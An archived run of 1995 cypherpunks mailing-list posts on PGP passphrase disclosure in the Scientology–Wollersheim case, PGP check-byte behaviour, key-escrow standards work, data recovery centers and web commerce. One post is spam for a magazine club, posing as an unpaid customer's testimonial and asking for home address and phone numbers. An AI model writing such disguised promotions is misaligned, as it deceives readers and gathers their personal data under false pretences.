I'm not sure that key disclosure will even be necessary - the Church (or whatever annoying tentacle of it is suing Wollersheim) is entitled to, for example, "a copy of . . . all documents, data compilations, and tangible things in the possession, custody, or control of the party that are relevant to disputed facts alleged with particularity in the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why Wollersheim couldn't comply with the discovery rules by providing plaintext copies of all relevant information, unless for some reason the passphrase is itself relevant.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFFFG33YhjZY3fMNAQGmLAP/S412cBRTRFRWou6mVjh7jbT9O3CIUPEB
oFuDLNy7pQR2ZaR5JOzSsCv9d96CpGdVjIWUxhP/Fz6tN3ZP7LuCXBssoIuiyuEp
z2e+LQthjcksUDqipR+QggIhN3hU66esg14WCF61yjwpXCukn13cOISYtBHRjc9g
sEiN0SXZ4tw=
=knU6
-----END PGP SIGNATURE-----

From cypherpunks at toad.com Sat Sep 9 01:46:19 1995
From: cypherpunks at toad.com (cypherpunks at toad.com)
Date: Sat, 9 Sep 95 01:46:19 PDT
Subject: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081654.AA03407@ch1d157nwk>
Message-ID: <199509090841.BAA01249@miron.vip.best.com>

>
>Tom Rollins writes:
>> If this is the file that the Co$ is trying to crack, then what the
>> is being asked for is a pass phrase that can be handed to the Co$
>> that will pass the PGP valid key check and still not decrypt the
>> data to anything useful.
>
>Well, I don't have the PGP 'conventional' encryption format memorized, but
>there is probably a constant after the IV that is prepended to the data. The
>constant is used to determine if the key is correct. Since the conventional
>encryption runs in CFB mode and there is a full block of random IV at the
>beginning of the file, it is extremely unlikely that a key could be found
>that would properly decrypt only the first two blocks while leaving the rest
>unreadable...
>
>> If Larry Wollersheim does have the valid key. It would be a simpler
>> process to know what fake key to use and work it backwards through
>> the MD5 to arrive at an ascii string to produce the fake key.
>
>Not really. Even if you could find an IDEA key that would produce the
>desired output it would be hard to find a passphrase that would produce that
>key when hashed. One of the properties of one-way hash functions is that it
>is difficult to find a plaintext that produces a given hash. Hence the term
>'one-way'.... Even if you did find a passphrase (which, if MD5 is strong,
>would require something like 2^64 operations), it would likely be long, have
>8-bit chars, and would be impossible to type in. It would be tough to
>convince anyone that it was the real passphrase.
>
>
>andrew
>

There was a hack to pgp ui published a while back that would allow someone decrypting a RSA encrypted file to print out the idea key.

Another feature of the hack allowed someone with the idea key to decrypt an RSA PGP encrypted file ignoring the RSA headers and using the IDEA key directly.

Using this software should allow the receiver of an RSA PGP encrypted file to allow someone else to decrypt it (by giving them the IDEA key) without exposing the secret key. The IV block check will allow them to check that they are using the correct idea key.

From janetdove at infosat.com Sat Sep 9 02:58:51 1995
From: janetdove at infosat.com (Janet Dove)
Date: Sat, 9 Sep 95 02:58:51 PDT
Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles
Message-ID:

Hi fellow 'netters,

My name is Janet Dove and I recently started using a magazine subscription club in the USA that has a FREE 1 yr. magazine subscription deal with your first paid order- and I have been very pleased with them. They have over 1,500 different USA titles that they can ship to any country on a subscription basis.
As for computer magazines from the USA, they have more of a selection than I ever knew even existed. They have magazines for most every area of interest in their list of 1,500 titles.

Within the USA, for their USA members, they are cheaper than all their competitors and even the publishers themselves. This is their price guarantee.

Overseas, on the average, they are generally around one-fourth to one-half of what the newsstands overseas charge locally for USA magazines. On some titles they are as little as one-tenth of what the newsstands charge. They feel that magazines should not be a luxury overseas. In the USA, people buy magazines and then toss them after reading them for just a few minutes or hours. They are so cheap in the USA! Well, this company would like to make it the same way for their overseas members. They are also cheaper than all their competitors in the USA and overseas, including the publishers themselves! This is their price guarantee.

Around one-half their business comes from overseas, so they are very patient with new members who only speak limited English as a 2nd language.

Their prices are so cheap because they deal direct with each publisher and cut-out all the middlemen.

They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and juicy) !)...if you completely fill out the form below. It has lists of all the freebies, lists of all the titles they sell, titles broken down by categories and detailed descriptions on nearly 1000 of the titles that they sell.

Please do not email me as I am just a happy customer and a *busy* student. I don't have time to even complete my thesis in time, let alone run my part-time software business!

Email them directly at: munish at grfn.org

*------------cut here-----------------------------------------------*

REQUEST FOR MORE INFO: please copy this section only and email to: munish at grfn.org (sorry, but incomplete forms *cannot* be acknowledged)

Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newsstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"):
(1. 22-part email message; 2. attached file by email)

{{{Note- 22-part email can be received by anyone with any computer. Attached file format may not be for you: it is sent as an uncompressed 400K file formatted in Microsoft Word text only format, on a Mac; if you don't use Microsoft Word on a Mac - you will have to know how to convert into a usable text format. We cannot help you with this. If in doubt, we suggest you go with the universally acceptable 22-part email message. You can always manually spend a few minutes pasting the parts into one whole.}}}

If you saw this on a newsgroup, which newsgroup did you see it on?:
How did you hear about us (name of person who referred you or the area of the internet that you saw us mentioned in):

Janet Dove 090895BGV

*------------cut here-----------------------------------------------*

They guarantee to beat all their competitors' prices. Sometimes they are less than half of the next best deal I have been able to find and other times, just a little cheaper - but I have never found a lower rate yet. They assured me that if I ever do, they will beat it.

They have been very helpful and helped me change my address from the USA to Finland and then back again when I moved last month. They are very knowledgeable about addressing mags worldwide.
They have a deal where you can get a free 1 yr. sub to a new magazine from a special list of over 300 popular titles published in the USA. They will give you this free 1 yr. sub when you place your first paid order with them to a renewal or new subscription to any of the over 1,500 different popular USA titles they sell. They can arrange delivery to virtually any country and I think they have clients in around 35 or 36 countries now. Outside the USA there is a charge for foreign postage and handling (on both paid and freebie subs) that varies from magazine to magazine.

I have found their staff to be very friendly and courteous. They even helped me with an address change when I moved from one country to another.

The owner thinks of his service as a "club" and his clients as "members" (even though there is no extra fee to become a member - your first purchase automatically makes you a member) and he is real picky about who he accepts as a new member. When he sets you up as a new member, he himself calls you personally on the phone to explain how he works his deal, or sometimes he has one of his assistants call. He is kind of quirky sometimes - he insists on setting up new members by phone so he can say hi to everyone (I sure wouldn't want to have his phone bills!), but you can place future orders (after your first order) via E-mail. He has some really friendly young ladies working for him, who seem to know just as much as he does about this magazine stuff. If you live overseas, he will even call you there, as long as you are interested, but I think he still makes all his overseas calls on the weekends, I guess cause the long distance rates are cheaper then.

He only likes to take new members from referrals from satisfied existing members and he does virtually no advertising. When I got set-up, they had a 2-3 week waiting list for new members to be called back so that they could join up. (Once you are an existing member, they help you immediately when you call.) I think they are able to get back to prospective new members the same day or within a few days now, as they have increased their staff. I am not sure about this.........but if you email the above form to them, that is the way to get started!

They will send you some FREE info. via E-mail (the short version (around 40K) of their catalogue, or if you request it the DELUXE LONG VERSION (around 400K-big and juicy) !)...if you fill out the form near the top of this message. They then send you email that outlines how his club works and the list of free choices that you can choose from, as well as the entire list of what he sells; and then they will give you a quick (3-5 minute) friendly, no-pressure no-obligation call to explain everything to you personally and answer all your questions.

Once you get in, you'll love them. I do.

For more info, just fill out the form near the top of this message and email it to: munish at grfn.org

Sincerely,

Janet Dove

From mfroomki at umiami.ir.miami.edu Sat Sep 9 07:08:41 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Sat, 9 Sep 95 07:08:41 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <199509090742.AA15129@ideath.goldenbear.com>
Message-ID:

On Sat, 9 Sep 1995, Greg Broiles wrote:
>
> the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why
> Wollersheim couldn't comply with the discovery rules by providing
> plaintext copies of all relevant information, unless for some reason
> the passphrase is itself relevant.
>

Ah. But if there is no plaintext, the question is whether you comply with the rule by providing the encrypted text rather than plaintext.
I would say you have to provide the plaintext in the absence of a legitimate privilege claim, but I don't recall a case to this effect (there is precedent for requiring translation of foreign language documents when the request is covered by an evidence convention; I don't recall if there are any such cases that fall purely under domestic US rules). Anyone have chapter and verse?

A. Michael Froomkin            | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law     | mfroomki at umiami.ir.miami.edu
U. Miami School of Law         | P.O. Box 248087
                               | It's hot here. And humid.
Coral Gables, FL 33124 USA     | See (soon to move to its real home):
http://www.law.miami.edu/~mfroomki

From an116512 at anon.penet.fi Sat Sep 9 10:09:11 1995
From: an116512 at anon.penet.fi (an116512 at anon.penet.fi)
Date: Sat, 9 Sep 95 10:09:11 PDT
Subject: not a flame please read and think about this
Message-ID: <9509091640.AA15487@anon.penet.fi>

to make my point: why is pat farrel helping the nsa and nist make better key escrow?

i quote mr farrel:

We reworded #5 to say "want to Trust the Product." This means that it is untampered, works as expected, etc. We then hashed out ways to know this. The list ended up looking like:

1. is available only as object code
2. contains some "hash" function to check for modifications
3. contains some unique hash, with uniqueness based upon something like "site," "per copy" or "per release"
4. Contains policies against modification, such as license language against decompilation.
5. OS-related security, such as runs "protected mode" instead of as a wild DOS program.

and

We then developed "goals" including:

1. One version for sale worldwide
2. Allow development in the US
3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-)
4. Must interoperate with everything
5. Receiver can only decrypt if escrow agencies can decrypt.

hey why not just write the escrow code for them!!!???

is mr farrel just being naive or does he realize who he's working for?
sorry to single him out but this is just an example of what i'm talking about. he is not the only example by far.

think people!!!!!

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.

From kelso at netcom.com Sat Sep 9 10:10:55 1995
From: kelso at netcom.com (Tom Rollins)
Date: Sat, 9 Sep 95 10:10:55 PDT
Subject: Scientology tries to break PGP - and fails? (fwd)
Message-ID: <199509091707.KAA15642@netcom17.netcom.com>

> >Tom Rollins writes:
> >> If this is the file that the Co$ is trying to crack, then what the
> >> is being asked for is a pass phrase that can be handed to the Co$
> >> that will pass the PGP valid key check and still not decrypt the
> >> data to anything useful.
> >
> >Well, I don't have the PGP 'conventional' encryption format memorized, but
> >there is probably a constant after the IV that is prepended to the data. The
> >constant is used to determine if the key is correct. Since the conventional
> >encryption runs in CFB mode and there is a full block of random IV at the
> >beginning of the file, it is extremely unlikely that a key could be found
> >that would properly decrypt only the first two blocks while leaving the rest
> >unreadable...
> >
> >> If Larry Wollersheim does have the valid key. It would be a simpler
> >> process to know what fake key to use and work it backwards through
> >> the MD5 to arrive at an ascii string to produce the fake key.
> >
> >Not really. Even if you could find an IDEA key that would produce the
> >desired output it would be hard to find a passphrase that would produce that
> >key when hashed. One of the properties of one-way hash functions is that it
> >is difficult to find a plaintext that produces a given hash. Hence the term
> >'one-way'.... Even if you did find a passphrase (which, if MD5 is strong,
> >would require something like 2^64 operations), it would likely be long, have
> >8-bit chars, and would be impossible to type in. It would be tough to
> >convince anyone that it was the real passphrase.
> >
> >
> >andrew
> >
>
> There was a hack to pgp ui published a while back that would allow
> someone decrypting a RSA encrypted file to print out the idea key.
>
> Another feature of the hack allowed someone with the idea key to decrypt
> an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
> key directly.
>
> Using this software should allow the receiver of an RSA PGP encrypted
> file to allow someone else to decrypt it (by giving them the IDEA key)
> without exposing the secret key. The IV block check will allow them to
> check that they are using the correct idea key.
>

Looking at the source code shows that all that is needed to pass the PGP key check is for the first two blocks to decode in such a way that the last 2 bytes of the IV match the 2 check bytes before the actual message. Thus the first 6 bytes of the IV and the last 6 bytes of the next block need not match the actual message.

There was a bug in the older versions of PGP that set the IV to a constant instead of a random value when encrypting with the "-c" option.

I made a mistake thinking that knowledge of the correct key would help in creating a fake key.

From roy at cybrspc.mn.org Sat Sep 9 11:00:49 1995
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 9 Sep 95 11:00:49 PDT
Subject: 9K P6
In-Reply-To: <199509082135.RAA26681@pipe2.nyc.pipeline.com>
Message-ID: <950909.114931.1m4.rnr.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya at pipeline.com quotes an Intel press release:

> Today, by making it possible to ensure the safety, reliability,
> and performance of the weapons stockpile while foregoing nuclear
> testing, the Intel/Sandia teraflop computer can help the world take
> a further step back from the shadows of war into the light of peace.

Intel's PR department has a great future doing Gummint work. This is a stellar example of Doublespeak. Kinda makes me nauseous.

- --
Roy M. Silvernail [ ] roy at cybrspc.mn.org
PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6
Key available from pubkey at cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFHGOBvikii9febJAQHd/QQAuGxuIEZDrAryaxcvANnpiHNJjVRcJT+D
YPjKdVdAPy/FN1fDLEkQeyJUPgzojDSsyyZnODIobT8uLBA36znodrlFYKBzFyxA
jpNYC4ef7DZU+Mm0NkoZN+3UY+GwaLc7Utfkg5eSj0e9awnbQ6+l56scwmCWZtF1
G+eOzU/i5wA=
=9giO
-----END PGP SIGNATURE-----

From hallam at w3.org Sat Sep 9 11:43:35 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 9 Sep 95 11:43:35 PDT
Subject: Scientology/Wollersheim as test case for key disclosure
In-Reply-To:
Message-ID: <9509091842.AA13158@zorch.w3.org>

One solution to this problem would be to modify PGP so that the session key for the document was released rather than the passphrase for the public key. The former would provide only read access, the latter would allow the Scientologists to forge Wollersheim's signature on other material.

In addition many of the documents may be subject to privilege. I would have thought that there would be grounds to oppose the court action in any case on various grounds, not least the previous judgement which the Scientologists lost and have failed to pay the damages awarded.
There might also be grounds to oppose disclosure if the case was brought in order to obtain secret material rather than for legitimate purposes. In the UK the judge can be asked to review documents and decide whether they should be made available.

Surely the disclosure laws would work in Wollersheim's favour in any case. He can request disclosure of internal Scientology material.

Phill

From pfarrell at netcom.com Sat Sep 9 11:59:27 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Sat, 9 Sep 95 11:59:27 PDT
Subject: Sigh Re: not a flame please read and think about this
Message-ID: <53877.pfarrell@netcom.com>

Subject line is bull*&^&, IMHO, of course

In message Sat, 9 Sep 1995 16:40:00 UTC, an116512 at anon.penet.fi writes:

> to make my point: why is pat farrel helping the nsa and nist make

Learn to spell my name. It is on my .sig, my keys, and in my userid. We blockheaded, Irish Catholic Americans are damn proud of our name. Farrell's (along with other cheap Irish labor) built the railroads from Chicago west. Please spell it correctly, even if you are flaming me.

> hey why not just write the escrow code for them!!!???
> is mr farrel just being naive or does he realize who he's working for?
> sorry to single him out but this is just an example of what i'm talking
> about.

I doubt that this clown deserves a response, but...

There were a number of cypherpunks there. I can't speak for all, but I expect motives include:

- attempting to clarify vague and confusing wording so we could understand what they wanted.
- seeing that working with them, rather than yelling at their stupidity, has a higher chance of getting results.
- we got to meet influential folks from industry who agree with us.
- some of us aren't completely opposed to CKE. I think it has value. If we could convert their plan for GAK into CKE, it would be a big win, well worth the effort.
- they are going to promulgate a FIPS PUB standard next week, whether I like it or not, and whether I help or not.
It is better to have that standard understandable and clear than fuzzy and subject to subjective evaluation.
- getting preposterous misstatements into the formal Federal Register so we can quote it back to them in the congressional hearings. Mr Geoff Greiveldinger's words should be handy to quote, for one example.
- there are lots more, but I doubt that I can convince this clown.

Pat

Pat Farrell      Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage                              #include

From usura at utopia.hacktic.nl Sat Sep 9 12:20:17 1995
From: usura at utopia.hacktic.nl (uSuRa)
Date: Sat, 9 Sep 95 12:20:17 PDT
Subject: WoT keyring (fwd)
Message-ID: <199509091919.VAA00549@utopia.hacktic.nl>

Forwarded message:

> From: don at stat8.byu.edu (Donald M. Kitchen)
>
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>
> Thanks
> Don

This file is available from:

ftp.hacktic.nl/pub/pgp/pgp-key-ring/donring.pgp.gz

944 -rw-r--r--  1 pub  pub  955577 Sep  8 18:37 donring.pgp.gz

EnJoY !
-AJ-

From sharborth at hai-net.com Sat Sep 9 12:21:44 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Sat, 9 Sep 95 12:21:44 PDT
Subject: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>

No, it's ocht hundert elf

Skip

______________________________ Reply Separator _________________________________
Subject: Re: [NOISE/Fun] some 'special' primes
Author: Michael at internet
Date: 09-09-95 00:34

> A bit more fun : German : 811 (dunno how to write it, but it starts
> with an "a")

acht hundert uenf (I think)

--Michael

From usura at utopia.hacktic.nl Sat Sep 9 12:24:38 1995
From: usura at utopia.hacktic.nl (uSuRa)
Date: Sat, 9 Sep 95 12:24:38 PDT
Subject: WoT keyring
In-Reply-To: <9409091627.AA05472@stat8.byu.edu>
Message-ID: <199509091923.VAA00663@utopia.hacktic.nl>

>From Donald M. Kitchen:
>
> Due to problems distributing my Web of Trust keyring from my own site,
> I have uploaded a .gz version. Please announce it to cpunks as soon
> as you have changed the permissions.
>
> Thanks
>
> Don
>

It's available from:

ftp.hacktic.nl/pub/pgp/pgp-key-ring

total 946
  1 drwxr-xr-x  2 pub  pub     512 Sep  9 21:15 ./
  1 drwxr-xr-x  4 pub  pub     512 Sep  9 21:14 ../
944 -rw-r--r--  1 pub  pub  955577 Sep  9 21:15 donring.pgp.gz

Regards,

-AJ-

From mike at uac.net Sat Sep 9 12:24:45 1995
From: mike at uac.net (Michael)
Date: Sat, 9 Sep 95 12:24:45 PDT
Subject: [NOISE/Fun] some 'special' primes
In-Reply-To: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>
Message-ID: <199509091924.PAA26191@mail1.uac.net>

> ocht hundert elf

How about a compromise...

acht hundert elf

--Michael

From sharborth at hai-net.com Sat Sep 9 12:31:10 1995
From: sharborth at hai-net.com (sharborth at hai-net.com)
Date: Sat, 9 Sep 95 12:31:10 PDT
Subject: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686811@houston_cc_smtp.hai-net.com>

yah

|> ocht hundert elf
|
|How about a compromise...
|
| acht hundert elf
|
|--Michael

From pfarrell at netcom.com Sat Sep 9 12:37:44 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Sat, 9 Sep 95 12:37:44 PDT
Subject: DC-area Meeting Sept 16
Message-ID: <56183.pfarrell@netcom.com>

The next DC-area cypherpunks meeting will be next Saturday afternoon at Digex's headquarters in suburban Maryland. Please mark your calendars. Directions, maps, and exact time will be published soon.

Doug Humphrey says that the office is less than one mile from public transportation. Carpools worked for the last meeting, so I expect rides from Northern Virginia and even Baltimore can be arranged.

Pat

Pat Farrell      Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage      #include

From alano at teleport.com Sat Sep 9 12:41:21 1995
From: alano at teleport.com (Alan Olsen)
Date: Sat, 9 Sep 95 12:41:21 PDT
Subject: cryptography eliminates lawyers?
Message-ID: <199509091941.MAA04904@desiree.teleport.com>

At 02:44 PM 9/8/95 -0400, you wrote:
>We wish! We really wish!

"Fill that lawyer with a few more slugs of encryption!"

The argument that encryption will free us from all the legal ills of the world is pretty specious. If anything it will make more work for lawyers as the non-clue-endowed portion of the world tries to come to terms with the new technology. They will make rules and subsets of rules and exceptions to rules and variations to interpretations of rules that will make the current set look like the rules to "chutes and ladders".

Part of the job of the lawyer class is to guarantee the existence of work for other lawyers (as well as themselves). It does not depend on what the medium of exchange is. Lawyers and government forces will try and figure out some way to try and extract it from you.

The government is trying very hard to keep any scrap of power from creeping away from them.
You can bet that they will try everything they can think of, rational and irrational, to regulate and control the wilds of cyberspace. They will pump up every imaginary boogieman to help them get the public to swallow what they are fed. By the time they figure out they have been had, it will be too late.

Cypherpunks must be the syrup of ipecac to the government's dose of poison to the body politic!

(I need to start drinking more coffee in the morning. I cannot believe I wrote that...)

Unfortunately the public does not thrive on logic. They have been trained to react emotionally to things and not react logically. I am not certain what can be used to get them to realize why they need encryption. Dispelling the bogeymen is one need.

The other thing is that the tools need to be made as simple as possible. The current tools for use require a fair bit of technical understanding. Until they have an integrated front-end that makes it about as easy to use as America On-Line, encryption will not gain widespread usage.

This is the type of code that needs to be written. Making integrated tools like newsreaders and mail programs that support strong encryption directly is what is needed for widespread use. (As well as being usable programs in and of themselves. Many of the programs for news and mail are crap.)

Making cryptography a "cool and fun thing to use" will help dispel many of the myths and may help to defuse the government created bogey men. (Of course they will claim that it aids "criminals and terrorists", but to them EVERYONE is a criminal and a terrorist.)

|        Visualize whirled keys                    | alano at teleport.com |
|"It's only half a keyserver. I had to split the   | Disclaimer:         |
|other half with the government man." - Black Art  | Ignore the man      |
|  -- PGP 2.6.2 key available on request --        | behind the keyboard.|
|  http://www.teleport.com/~alano                  |                     |

From goedel at tezcat.com Sat Sep 9 12:50:58 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Sat, 9 Sep 95 12:50:58 PDT
Subject: [NOISE/Fun] some 'special' primes
Message-ID:

> No, it's
>
> ocht hundert elf
>
> Skip
>

acht, not ocht.

DJK

From vznuri at netcom.com Sat Sep 9 13:03:58 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 9 Sep 95 13:03:58 PDT
Subject: Internet commerce mtg, Denver
Message-ID: <199509092000.NAA14106@netcom19.netcom.com>

I went to an Internet commerce convention meeting in Denver last week, and thought some here would be interested in some of the topics and companies.

the most important company I saw at the meeting is called "YellowNet". I knew this would happen someday, but this company is attempting to build up a *world wide* online business directory accessible over the web. they are trying to build up the infrastructure to handle up to 1M hits per day. a rep told me they were going to go all out in a publicity blitzkrieg at the beginning of Oct., but for now they are getting ready for prime time. it's currently a private company but I suspect they may go public in a year or two.

the rep told me something interesting: he said that every Bell phone book is actually "seeded" with dummy names so they can detect copyright infringers. if you come out with a business directory, these Bells will just scan for the fake names that they have inserted into their own listings. if they find them, supposedly they can show them to a copyright judge and he will immediately close down your operation and fine you, almost no questions asked. I didn't know how much of this really happens (the legal stuff sounded questionable to me) but it is an interesting "real world" instance of copyright terrorism prevention that the "information liberation front" would have to contend with.

the rep told me that they were willing to go to "Philippine calling houses" that do nothing but contract out to companies, and have the laborers dial the long lists of phone numbers to verify them.
as I understand it they exist and supposedly the long distance is so cheap now that they are actually profitable being run out of the Philippines or wherever. he said his company was about to do this when they found a national CD directory of businesses, and they were grudgingly willing to license the CD information for the web pages.

anyway, cpunks, you may be interested in getting in on the ground floor of something like this. the yellow pages are an *extremely* lucrative source of income for phone companies and if they don't compete over the web, I think they are going to become increasingly obsolete-- esp. when the Web becomes accessible to the home more readily through e.g. cable companies.

the URL: http://www.yellownet.com

what I am suspecting however is that these kinds of services are going to be common, and it will not be that difficult to get your *pointer* into them for free. as far as them offering advertisements, though, I can't see how they could charge much more than a standard web site service charge for some pages. in other words, the days of hundreds of dollars for a display ad are probably not going to happen on the web, IMHO. and I don't see how they could charge for mere pointers at all, given that the competition will probably give them away.

--

the other major companies at the show were generally large and small internet providers, and a lot of web page consulting firms (large and small). various network connection providers & consultants, etc.

another thing I would like to clue everyone in on, if it isn't already obvious: the Web is going to go crazy as companies realize they can have dynamic forms to serve customers without any clerks required. this is going to be a *very* hot area of development over the next few years IMHO.
it is really not that big of a deal to have an inert "online brochure" but the technical capability required to do programming behind forms to interface with company databases is not trivial, and I think this is going to become an extremely hot occupation over the next few years. in other words, programmers who can customize web sites to interface to the existing company's databases and computer infrastructure will be very valuable. this is called "CGI"; many of you are probably already experts in it. (if you are, I'd like to talk to you about an application I'm trying to write...)

examples of this are infinite, but a few: a customer could query the company inventory, find what stores are nearest to his home, find what store has what he wants in stock immediately, check on special prices and discounts of the moment, etc. he might be able to put himself on a company mailing list, etc. so far I have not seen this very widespread, these customized web applications, but I think they are really going to proliferate massively.

I have also been seeing a lot of excitement over Java, and I think this really has the potential to become a "net standard binary interchange format". however I think the day when the Java apps are proliferating all over the net will be quite a while away (6 mos or more at least) and that businesses are still probably going to want to use the more prosaic form interfaces for compatibility and simplicity.

Java is really starting out right, in that it begins on day 1 as a totally free, open standard. Sun and Netscape are not claiming burdensome proprietary rights to it. this makes it amazingly attractive. the market has shown repeatedly that it will often go with an inferior open standard in preference to a technologically superior closed one. (and IMHO with good reason.. the market is pretty rational, just not in ways technophiles necessarily expect).
another thing I saw that Sun is promoting: they now have Web authoring applications that require almost no HTML expertise whatsoever. you can drag and drop pictures where you want them in the documents etc. I suspect this may become the preferred way to work on web documents in the future to the point that people who actually memorize all the HTML commands may be in the minority. this actually argues in favor of an HTML that is not necessarily that pretty or syntactically consistent (of course, both aspects have already been pretty much lost in the mad rush to add new features anyway).

--

another thing I'd like to point out is that there are a lot of hackers here with specialized knowledge of the web and perl and other tools, and in our culture (the cypherpunk list, e.g.) these things are considered pretty simple, mundane, and obvious, but there is an enormous business culture out there with a lot of money and not very many clues about this technology. the consulting opportunities for "small fries" are becoming very attractive and widespread. it is easy for us to say, "oh, that's no big deal, why would anyone pay money for that??" but in fact what is happening is that people are paying *big* money for simple things like HTML expertise.

there were a total of about 50 classes at this show, and you'd be really surprised how many were on fairly basic subjects like "what is the internet? what is the web? what can it do for me?" etc. however, many of these classes focused on secure banking transactions. and cryptographic expertise will probably move to the forefront of job requirements in about a year for these kinds of jobs, I would imagine. they will probably tend to emphasize the need for background in security related applications.
right now there are a lot of toy, insecure applications but it is only a matter of time before people realize that if you really want to get serious, you have to have cryptography tied in and sharp people to plug all possible security holes, and you don't want stuff made out of "bubblegum and baling wire".

so it appears that cypherpunks are really positioned on the crest of a tidal wave!! any of "us" who have been on the list in the pre-web era are beginning to feel like old fogeys from the prehistoric era!! it seems that cyberspace for the elite was born with the Internet, but "cyberspace for the unwashed masses" was born with the Web.

--Vlad Nuri

From anonymous-remailer at shell.portal.com Sat Sep 9 13:07:51 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 9 Sep 95 13:07:51 PDT
Subject: Sigh Re: not a flame please read and think about this
Message-ID: <199509092006.NAA05181@jobe.shell.portal.com>

Pat F A R R E L L wrote:

/ Subject line is bull*&^&, IMHO, of course

Hey, everyone has an opinion.

In message Sat, 9 Sep 1995 16:40:00 UTC, an116512 at anon.penet.fi writes:

> to make my point: why is pat farrel helping the nsa and nist make

/Learn to spell my name. It is on my .sig, my keys, and in my userid.
/We blockheaded, Irish Catholic Americans are damn proud of our name.
/Farrells (along with other cheap Irish labor) built the railroads
/from Chicago west. Please spell it correctly, even if you are flaming me.

F A R R E L L M O U S E

> hey why not just write the escrow code for them!!!???
> is mr farrel just being naive or does he realize who hes working for?
> sorry to single him out but this is just an example of what im talking
> about.

/I doubt that this clown deserves a response, but...

Then shut up.

/There were a number of cypherpunks there. I can't speak for all,
/but I expect motives include:

/- attempting to clarify vague and confusing wording so we could
/understand what they wanted.
'k

/- seeing that working with them, rather than yelling at their stupidity,
/has a higher chance of getting results.

Beware of compromise, you become the rag puller for the rapist.

/ - we got to meet influential folks from industry who agree with us.

'k

/- some of us aren't completely opposed to CKE. I think it has value.
/If we could convert their plan for GAK into CKE, it would be a big win,
/well worth the effort.

Yea right.

/ - they are going to promulgate a FIPS PUB standard next week, whether I
/like it or not, and whether I help or not. It is better to have that
/standard understandable and clear than fuzzy and subject to subjective
/evaluation.

Clear as any government forced standard can be.

/ - getting preposterous misstatements into the formal Federal Register so
/ we can quote it back to them in the congressional hearings. Mr Geoff
/ Greiveldinger's words should be handy to quote, for one example.

'k

/- there are lots more, but I doubt that I can convince this clown.

Then shut up.

From cme at acm.org Sat Sep 9 13:22:53 1995
From: cme at acm.org (cme at acm.org)
Date: Sat, 9 Sep 95 13:22:53 PDT
Subject: GAK
In-Reply-To:
Message-ID: <9509092013.AA02155@tis.com>

>Date: Fri, 8 Sep 1995 17:58:57 -0800
>From: cman at communities.com (Douglas Barnes)
>
>
>>
>>If too much attractive stuff is available by loss of any one public key,
>>that key gets attacked. To compensate for this, the TIS DRC generates new
>>public keys periodically to give out to new (or old) customers.
>>
>>However, a government warrant which demands the DRC's private key collection
>>would gain quite a harvest.
>
>The economics of the situation seem to dictate that whether you have
>one key or N keys, it's going to be cheaper to subvert the escrow agent
>(you guys or whoever) than it is to brute-force even one key.

You're right, of course. That's why I, personally, would trust my key backup only to (k of n) TIS DRCs in Earth orbit or farther out.
>You may feel very comfortable with the personnel and procedures you
>have in place now, ....

People keep assuming that TIS will run a commercial DRC. We do not plan to. We did the design and will sell DRC hardware and security consulting (physical, policy, ...) to companies wanting to set up their own for internal use. That's the only mass DRC market we envision. This could change, but that's the current plan.

Meanwhile, the real question is GAK -- whether the DRC you choose to use goes along with it or not. You might check my home page for my views on GAK.

It is possible to have a Corporation running a DRC which refuses to play along with GAK. They won't be blessed for attachment to exportable crypto, most likely, but it's entirely possible for this to exist. Tim May may run one, for example. (I'd still want it to be in orbit.)

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison     cme at acm.org     http://www.clark.net/pub/cme/home.html |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+

From zinc at zifi.genetics.utah.edu Sat Sep 9 13:52:23 1995
From: zinc at zifi.genetics.utah.edu (zinc)
Date: Sat, 9 Sep 95 13:52:23 PDT
Subject: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID:

